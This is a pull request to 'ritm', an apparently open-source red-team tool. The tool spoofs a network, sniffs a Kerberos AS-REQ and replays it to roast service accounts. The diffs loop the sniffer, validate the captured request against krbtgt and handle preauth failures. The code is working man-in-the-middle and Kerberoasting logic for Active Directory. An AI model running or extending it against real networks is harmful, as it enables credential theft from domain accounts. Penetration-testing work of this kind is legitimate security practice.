### PR TITLE
Wrap the sniffer in a while loop

### DIFF
--- a/ritm/__main__.py
+++ b/ritm/__main__.py
@@ -25,7 +25,7 @@ def main(
     banner()
 
     init_logger(debug)
-    users = users_file.read().split('\n')
+    users = users_file.read().splitlines()
 
     Spoofer._enable_ip_forwarding()
 
@@ -36,11 +36,17 @@ def main(
         sniffer = Sniffer(interface)
         sniffer.run()
         
-        while sniffer.as_req_packet == None:
-            pass
+        while True:
+            while sniffer.as_req_packet == None:
+                pass
 
-        roaster = Roaster(users, sniffer.as_req_packet, output_file, dc_ip)
-        roaster.roast()
+            roaster = Roaster(users, sniffer.as_req_packet, output_file, dc_ip)
+            roaster.roast()
+
+            if roaster.roasted > 0:
+                break
+
+            sniffer.as_req_packet = None
 
         logger.info('Preparing to shutdown, may take several seconds..')
         

--- a/ritm/__main__.py
+++ b/ritm/__main__.py
@@ -42,19 +42,18 @@ def main(
             roaster = Roaster(users, sniffer.as_req_packet, output_file, dc_ip)
             roaster.roast()
 
-            if roaster.as_req_is_valid and roaster.roasted > 1:
+            if roaster.as_req_is_valid and roaster.roasted > 0:
                 break
             
             if not roaster.as_req_is_valid:
-                logger.info('Captured AS_REQ is not valid, restarting the sniffer...')
-            elif roaster.roasted <= 1:
+                logger.info('Captured AS_REQ is not valid, continuing to sniff...')
+            elif roaster.roasted == 0:
                 logger.info('No account was successfully roasted (wrong entries in the users file?)')
                 break
 
             sniffer.as_req_packet = None
-            sniffer.stop()
 
-        logger.info('Preparing to shutdown, may take several seconds..')
+        logger.info('Preparing to shutdown, may take several seconds...')
 
     except KeyboardInterrupt:
         logger.info('Preparing to shutdown, may take several seconds...')

--- a/ritm/__main__.py
+++ b/ritm/__main__.py
@@ -34,32 +34,35 @@ def main(
         spoofer.start()
         
         sniffer = Sniffer(interface)
-        sniffer.run()
-        
         while True:
+            sniffer.run()
             while sniffer.as_req_packet == None:
                 pass
 
             roaster = Roaster(users, sniffer.as_req_packet, output_file, dc_ip)
             roaster.roast()
 
-            if roaster.roasted > 0:
+            if roaster.as_req_is_valid and roaster.roasted > 1:
+                break
+            
+            if not roaster.as_req_is_valid:
+                logger.info('Captured AS_REQ is not valid, restarting the sniffer...')
+            elif roaster.roasted <= 1:
+                logger.info('No account was successfully roasted (wrong entries in the users file?)')
                 break
 
             sniffer.as_req_packet = None
+            sniffer.stop()
 
         logger.info('Preparing to shutdown, may take several seconds..')
-        
+
+    except KeyboardInterrupt:
+        logger.info('Preparing to shutdown, may take several seconds...')
+
+    finally:
         sniffer.stop()
         spoofer.stop()
 
-        logger.info('Done!')
-    except KeyboardInterrupt:
-        logger.info('Preparing to shutdown, may take several seconds...')
-        
-        sniffer.stop()
-        spoofer.stop()
-        
         logger.info('Done!')
         
 

--- a/ritm/lib/roaster.py
+++ b/ritm/lib/roaster.py
@@ -20,7 +20,7 @@ class Roaster:
         self.__output_file_handle = None
         self.__cname = None
         self.__realm = None
-        self.roasted = 0
+        self.roasted = -1
 
 
     # replay the sniffed AS-REQ with alternate sname fields,
@@ -55,7 +55,7 @@ class Roaster:
             if self.__output_file:
                 self.__output_file_handle.close()
 
-            logger.info(f'Roaster complete! Performed {self.roasted} roast attempts')
+            logger.info(f'Roaster complete! Roasted {self.roasted} accounts')
         else:
             self.as_req_is_valid = False
 

--- a/ritm/lib/roaster.py
+++ b/ritm/lib/roaster.py
@@ -20,7 +20,7 @@ class Roaster:
         self.__output_file_handle = None
         self.__cname = None
         self.__realm = None
-        self.__roasted = 0
+        self.roasted = 0
 
 
     # replay the sniffed AS-REQ with alternate sname fields,
@@ -51,7 +51,7 @@ class Roaster:
         if self.__output_file:
             self.__output_file_handle.close()
         
-        logger.info(f'Roaster complete! Roasted {self.__roasted} accounts')
+        logger.info(f'Roaster complete! Roasted {self.roasted} accounts')
 
     
     # slightly modified from 
@@ -126,6 +126,9 @@ class Roaster:
             elif e.getErrorCode() == constants.ErrorCodes.KDC_ERR_S_PRINCIPAL_UNKNOWN.value:
                 logger.debug(f'Received [red bold]ERR_S_PRINCIPAL_UKNOWN[/] for SPN [blue bold]{username}[/]', extra=OBJ_EXTRA_FMT)
                 return
+            elif e.getErrorCode() == constants.ErrorCodes.KDC_ERR_PREAUTH_FAILED.value:
+                logger.debug(f'Received [red bold]KDC_ERR_PREAUTH_FAILED[/] for SPN [blue bold]{username}[/] (probably invalid password was entered)', extra=OBJ_EXTRA_FMT)
+                return
             else:
                 raise e
         except OSError as e:
@@ -136,7 +139,7 @@ class Roaster:
             exit(1)
         
         logger.info(f'Roasted SPN [blue bold]{username}[/] :fire:', extra=OBJ_EXTRA_FMT)
-        self.__roasted += 1
+        self.roasted += 1
         self._outputTGS(r, username, username)
 
 

--- a/ritm/lib/roaster.py
+++ b/ritm/lib/roaster.py
@@ -42,21 +42,27 @@ class Roaster:
             logger.debug(f'[bright_cyan bold]--dc-ip[/] not specified, setting DC to {self.__realm}', extra=OBJ_EXTRA_FMT)
 
         logger.info('Starting roaster...')
-        logger.info(f'Attempting to roast {len(self.__users)} users')
 
-        for user in self.__users:
-            if user != '':
-                self._construct_AS_REQ(user)
+        logger.info('Checking if the captured AS_REQ is valid with a request for krbtgt')
+        if self._construct_AS_REQ('krbtgt', output=False):
+            self.as_req_is_valid = True
 
-        if self.__output_file:
-            self.__output_file_handle.close()
-        
-        logger.info(f'Roaster complete! Roasted {self.roasted} accounts')
+            logger.info(f'The AS_REQ is valid! Attempting to roast {len(self.__users)} users')
+            for user in self.__users:
+                if user != '':
+                    _ = self._construct_AS_REQ(user)
 
-    
+            if self.__output_file:
+                self.__output_file_handle.close()
+
+            logger.info(f'Roaster complete! Performed {self.roasted} roast attempts')
+        else:
+            self.as_req_is_valid = False
+
+
     # slightly modified from 
     #   https://github.com/SecureAuthCorp/impacket/blob/master/impacket/krb5/kerberosv5.py#L95
-    def _construct_AS_REQ(self, username):
+    def _construct_AS_REQ(self, username, output=True):
         clientName = Principal(self.__cname, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
 
         # new raw AS-REQ
@@ -125,10 +131,10 @@ class Roaster:
                 r = sendReceive(message, self.__realm, self.__kdcIP)
             elif e.getErrorCode() == constants.ErrorCodes.KDC_ERR_S_PRINCIPAL_UNKNOWN.value:
                 logger.debug(f'Received [red bold]ERR_S_PRINCIPAL_UKNOWN[/] for SPN [blue bold]{username}[/]', extra=OBJ_EXTRA_FMT)
-                return
+                return False
             elif e.getErrorCode() == constants.ErrorCodes.KDC_ERR_PREAUTH_FAILED.value:
                 logger.debug(f'Received [red bold]KDC_ERR_PREAUTH_FAILED[/] for SPN [blue bold]{username}[/] (probably invalid password was entered)', extra=OBJ_EXTRA_FMT)
-                return
+                return False
             else:
                 raise e
         except OSError as e:
@@ -140,7 +146,11 @@ class Roaster:
         
         logger.info(f'Roasted SPN [blue bold]{username}[/] :fire:', extra=OBJ_EXTRA_FMT)
         self.roasted += 1
-        self._outputTGS(r, username, username)
+
+        if output:
+            self._outputTGS(r, username, username)
+
+        return True
 
 
     # https://github.com/ShutdownRepo/impacket/blob/getuserspns-nopreauth/examples/GetUserSPNs.py#L178


### PR DESCRIPTION
Hey @Tw1sm! Thanks for the awesome tool!

I'd like to propose a few cosmetic changes in this PR:

1. Replaced `.split('\n')` with `.splitlines()` so it ignores the last `\n` character and now shows the correct number of the users to roast.
2. Wrapped the sniffer into a `while` loop so it stops now only when a correct TGS has been obtained. It can be handy when you leave the tool running in the background.
3. Added handling of the `KDC_ERR_PREAUTH_FAILED` error which can frequently occure (e.g., when the target user has mistyped her own password).